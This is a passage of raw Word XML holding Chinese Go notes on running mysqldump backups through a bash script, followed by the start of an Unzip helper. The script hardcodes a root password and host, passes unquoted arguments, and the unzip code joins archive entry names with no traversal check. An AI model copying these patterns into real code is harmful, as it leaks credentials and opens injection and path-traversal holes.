        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>` -t` + ` --databases ` + databaseName + ` --tables ` + table +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CDBB16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>` --where=" published &gt; '` + datetimeStr + `' or updated &gt;'` + datetimeStr + `'"` + `  ` + ` &gt; ` + backupPath + ` `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278EF7FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32CC52D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Printf("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行的语句为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%s\n", mysqldumpCmd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6392E934" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err := executiveCommand(mysqldumpCmd); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16096DB3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Printf("%s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增量同步结束</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\n", table)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C21E88" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1A0B37" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">//TODO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果这个文件为空的话，直接删了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2D2595" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6507A58F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func executiveCommand(command string) error {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71675662" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要执行命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2469DBF9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>cmd := exec.Command(command)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C28A85E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>std, err := cmd.CombinedOutput()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECFC783" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5425AA41" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Printf("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现错误，错误输出为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%s\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，错误为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%s\n", std, err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44016C42" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A3085B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A843F82" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E853DC3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789F2C04" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:t>在执行过程中，命令内容被篡改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D688EEA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:t>解决方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3F6B6A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:t>写了shell脚本，并用$1$2$3这种方式接收参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F08BB7E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D0D9F86" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EADADD9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>echo "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接受库名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: $1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F33354" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>echo "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接受表名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: $2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1804DAA9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>echo "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接受更新时间戳</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: $3"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D454144" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>echo "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接受备份路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: $4"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E58633" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqldump -h 192.168.3.184 -P 3306 -uroot -pwenhailin -t --databases $1 --tables $2  --where=" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>published &gt; $3 or updated &gt;$3" &gt; $4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645A2AB7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7225A6AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>执行命令执行时，写这个脚本位置再写参数，可以顺利执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2977AF16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>比如我的更改如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F84A50C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>shellPath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是我提前写好的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>脚本，接收参数的那种</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBCB731" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>cmdSlice := []string{shellPath, databaseName, table, `'` + datetimeStr + `'`, backupPath}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CCBA21" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>执行命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>", strings.Join(cmdSlice, " "))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210D49F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15DBA1F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>var stdout, stderr bytes.Buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E11F4E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>cmd := exec.Command("bash", cmdSlice...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487AAB02" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>cmd.Stdout = &amp;stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FF43FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>cmd.Stderr = &amp;stderr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE04010" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err := cmd.Run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09068905" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC34B2C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">fmt.Printf("[!] </w:t>
      </w:r>
      <w:r>
        <w:t>出现错误</w:t>
      </w:r>
      <w:r>
        <w:t>\n[!] cmd</w:t>
      </w:r>
      <w:r>
        <w:t>标准输出为：</w:t>
      </w:r>
      <w:r>
        <w:t>%s[!] cmd</w:t>
      </w:r>
      <w:r>
        <w:t>标准错误为：</w:t>
      </w:r>
      <w:r>
        <w:t>%s", string(stdout.Bytes()), string(stderr.Bytes()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1127C655" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println("[!] err</w:t>
      </w:r>
      <w:r>
        <w:t>报错</w:t>
      </w:r>
      <w:r>
        <w:t>: ", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF05B35" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E7E029" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">fmt.Println("[#] </w:t>
      </w:r>
      <w:r>
        <w:t>命令执行成功</w:t>
      </w:r>
      <w:r>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028F71EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541202DC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52049E7F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16414030" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">os.MkdirAll: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建多级目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604820F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A249D89" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func Unzip(src, dst string) (err error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BC5E64" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>zr, err := zip.OpenReader(src)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7E296C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>defer zr.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65080141" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F24FF77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496964CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4CEDF4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for _, file := range zr.File {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01518F8C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>path := filepath.Join(dst, file.Name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FCA289" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果是目录，就创建目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F42FD8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if file.FileInfo().IsDir() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DC6126" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
